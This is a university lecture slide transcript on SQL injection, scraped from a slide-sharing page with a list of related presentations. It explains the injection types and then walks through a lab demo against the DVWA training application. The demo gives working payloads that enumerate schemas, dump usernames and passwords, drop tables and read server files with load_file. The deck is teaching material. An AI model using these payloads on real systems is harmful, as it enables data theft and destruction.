NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

Slides:



Advertisements
Similar presentations
Module XIV SQL Injection
Advertisements

PHP II Interacting with Database Data. The whole idea of a database-driven website is to enable the content of the site to reside in a database, and to.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
Introduction The concept of “SQL Injection”
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Database Connectivity Rose-Hulman Institute of Technology Curt Clifton.
07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Database Connectivity in PHP Basharat Mahmood, Department of Computer Science,CIIT,Islamabad, Pakistan. 1.
ASP.NET Programming with C# and SQL Server First Edition Chapter 8 Manipulating SQL Server Databases with ASP.NET.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Website Development Working with MySQL. What you will achieve today! Connecting to mySql Creating tables in mySql Saving data on a server using mySql.
Chapter 7 Managing Data Sources. ASP.NET 2.0, Third Edition2.
1 Nassau Community CollegeProf. Vincent Costa Acknowledgements: Introduction to Database Management, All Rights ReservedIntroduction to Database Management.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
SJSU CS157B Dr. Lee1  2004 Jenny Mitchell Two Useful Tools You Can’t Live Without by Jenny Mitchell SJSU CS157B Section PHP and MySQL.
Secure Software Engineering: Input Vulnerabilities
MIS Week 11 Site:
INTERNET APPLICATION DEVELOPMENT For More visit:
Analysis of SQL injection prevention using a proxy server By: David Rowe Supervisor: Barry Irwin.
Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science.
(CPSC620) Sanjay Tibile Vinay Deore. Agenda  Database and SQL  What is SQL Injection?  Types  Example of attack  Prevention  References.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 5 “Database and Cloud Security”.
Lecture 16 Page 1 CS 236 Online SQL Injection Attacks Many web servers have backing databases –Much of their information stored in a database Web pages.
Web Scripting [PHP] CIS166AE Wednesdays 6:00pm – 9:50pm Rob Loy.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
Strategic Security, Inc. © Introduction To SQL Injection Presented By: Joe McCray
Attacking Data Stores Brad Stancel CSCE 813 Presentation 11/12/2012.
Analysis of SQL injection prevention using a filtering proxy server By: David Rowe Supervisor: Barry Irwin.
Accessing Your MySQL Database from the Web with PHP (Ch 11) 1.
Retrieving data from MySQL using PHP Basharat Mahmood, Department of Computer Science,CIIT,Islamabad, Pakistan. 1.
SQL INJECTIONS Presented By: Eloy Viteri. What is SQL Injection An SQL injection attack is executed when a web page allows users to enter text into a.
Sumanth M Ganesh B CPSC 620.  SQL Injection attacks allow a malicious individual to execute arbitrary SQL code on your server  The attack could involve.
Aniket Joshi Justin Thomas. Agenda Introduction to SQL Injection SQL Injection Attack SQL Injection Prevention Summary.
SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister.
Controlling Web Site Access Using Logins CS 320. Basic Approach HTML form a php page that collects the username and password  Sends them to second PHP.
WEB SECURITY WEEK 2 Computer Security Group University of Texas at Dallas.
PHP Error Handling & Reporting. Error Handling Never allow a default error message or error number returned by the mysql_error() and mysql_errno() functions.
SQL Injection Anthony Brown March 4, 2008 IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions.
INFO 344 Web Tools And Development CK Wang University of Washington Spring 2014.
Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.
Web Applications Attacks A: SQL Injection Stored Cross Site Scripting Prof. Reuven Aviv Department of Computer Science Tel Hai Academic College Topics.
ADVANCED SQL.  The SQL ORDER BY Keyword  The ORDER BY keyword is used to sort the result-set by one or more columns.  The ORDER BY keyword sorts the.
SQL Injection By: Ayman Mohamed Abdel Rahim Ali Ehab Mohamed Hassan Ibrahim Bahaa Eldin Mohamed Abdel Sabour Tamer Mohamed Kamal Eldin Jihad Ahmad Adel.
SQL Injection By Wenonah Abadilla. Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements.
M M Waseem Iqbal.  Cause: Unverified/unsanitized user input  Effect: the application runs unintended SQL code.  Attack is particularly effective if.
SQL INJECTION Diwakar Kumar Dinkar M.Tech, CS&E Roll Diwakar Kumar Dinkar M.Tech, CS&E Roll
“Why is my blog selling boner pills?” An introduction to common web application attacks such as SQLi, XSS and command injection.
SQL Injection By Wenonah Abadilla.
Database and Cloud Security
Creating Database Objects
WEB APPLICATION TESTING
10 | Programming with Transact-SQL
Unix System Administration
SQL INJECTION ATTACKS.
Intro to Ethical Hacking
ISC440: Web Programming 2 Server-side Scripting PHP 3
Chapter 13 Security Methods Part 3.
Lecture 2 - SQL Injection
Tutorial 6 PHP & MySQL Li Xu
SQL Injection Attacks John Sweetnam
PHP Forms and Databases.
Protecting Against Common Web Application Vulnerabilities
Lecture 27 Security I April 4, 2018 Open news web sites.
Creating Database Objects
Presentation transcript:

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba Czech Republic SQL Injection

navy.cs.vsb.cz 2 SQL Injection SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. – Even parameterized data can be manipulated by a skilled and determined attacker. The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed.

navy.cs.vsb.cz 3 SQL Injection A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed. The injection process works by prematurely terminating a text string and appending a new command. – Because the inserted command may have additional strings appended to it before it is executed, the malefactor terminates the injected string with a comment mark "--". Subsequent text is ignored at execution time.

navy.cs.vsb.cz 4 Example <?php $query = "SELECT * FROM products WHERE id = '$productId'"; $result = mysql_query($query); ?> $productId = 1’ ;drop table products --‘ SELECT * FROM products WHERE id=‘1’; drop table products--’

navy.cs.vsb.cz 5 SQL Injection Types Inband or inline: SQL injections that use the same communication channel as input to dump the information back are called inband or inline SQL Injections. For example, a query parameter, if injectable, leads to the dumping of info on the web page. Out-of-band: Injections that use a secondary or different communication channel to dump the output of queries performed via the input channel are referred to as out-of-band SQL injections. For example, the injection is made to a web application and a secondary channel such as sends data back to attacker. Inferential (Blind SQL Injection): There is no actual data transfer. The attacker is able to reconstruct the information by sending particular requests and observing the resulting behavior of the website/DB.

navy.cs.vsb.cz 6 SQL Injection Types – Tautology based (1=1 or “”=“” is always True) SELECT * FROM Users WHERE UserId = 105 or 1=1 SELECT * FROM Users WHERE Name =“xxx" or ""="" AND Pass =“dunno" or ""="" – Based on Batched SQL Statements SELECT * FROM Users WHERE UserId = 105; DROP TABLE Users – Union based SELECT name,price FROM Products WHERE id=1 UNION SELECT userName, password FROM Users

navy.cs.vsb.cz 7 DEMO - Tools Hosted web application (DVWA) Basic knowledge of SQL

navy.cs.vsb.cz 8 DEMO Attacker logs into target web application as a common user. User name: smithy Password: password Navigate to SQL injection page Try legitimate input. Type in – 1 – 2

navy.cs.vsb.cz 9 DEMO Try if the application allows to proceed our queries from html input – 1 # - hash stands for comment The query might look like: – SELECT id, first_name, last_name FROM users WHERE id = '1 # - hash stands for comment'

navy.cs.vsb.cz 10 DEMO According to results, we can guess the form of the SQL query: – SELECT id, first_name, password FROM users WHERE id = '$id'

navy.cs.vsb.cz 11 DEMO Try to get list of all users – ' OR 1=1 # – select id, first_name, password from users where id = '' OR 1=1 #'

navy.cs.vsb.cz 12 DEMO Try to determine number of output parameters in the query – ' OR 1=1 ORDER BY 1 # – ' OR 1=1 ORDER BY 2 # – ' OR 1=1 ORDER BY 3 # – select id, first_name, last_name from users where id = '' OR 1=1 ORDER BY 3 #'

navy.cs.vsb.cz 13 DEMO We got an error while executing query – select id, first_name, last_name from users where id = '' OR 1=1 ORDER BY 3 #' It means that the query has only 2 output parameters. The query might look like: – select first_name, last_name from users where id = '$id'

navy.cs.vsb.cz 14 DEMO Try to determine database name and version – ' AND 1=1 UNION SELECT database(), version()#

navy.cs.vsb.cz 15 DEMO Try to determine user which is connected to the database – ' AND 1=1 UNION SELECT null, user()#

navy.cs.vsb.cz 16 DEMO Try to obtain list of databases created in the DB server – ' AND 1=1 UNION SELECT null, table_schema FROM information_schema.tables #

navy.cs.vsb.cz 17 DEMO Try to obtain list of databases and their tables created in the DB server – ' AND 1=1 UNION SELECT table_name, table_schema FROM information_schema.tables #

navy.cs.vsb.cz 18 DEMO Try to obtain list of tables from our dvwa database – ' AND 1=1 UNION SELECT table_name, table_schema FROM information_schema.tables WHERE table_schema='dvwa' #

navy.cs.vsb.cz 19 DEMO Try to obtain list of tables and their columns from our dvwa database – ' AND 1=1 UNION SELECT table_name, column_name FROM information_schema.columns WHERE table_schema='dvwa' #

navy.cs.vsb.cz 20 DEMO Try to obtain list of users with their passwords – ' AND 1=1 UNION SELECT user, password FROM dvwa.users#

navy.cs.vsb.cz 21 DEMO Try to read file stored in file storage of the database server – ' UNION SELECT 1, load_file('c:/myCreditCardSecret.t xt') #

navy.cs.vsb.cz 22 DEMO Try to read hosts file stored in file storage of the database server – ' UNION SELECT 1, load_file('c:/windows/system32/drivers/e tc/hosts') #

navy.cs.vsb.cz 23 References DVWA ons.html eterization_Cheat_Sheet HACKING EXPOSED (ISBN: ) Penetration testing (ISBN-10: ) Principles of Computer Security (ISBN: )

navy.cs.vsb.cz 24 Warning Hacking is illegal because it is getting into a system another person owns. If you wanted to do legal hacking then you would have to own the system.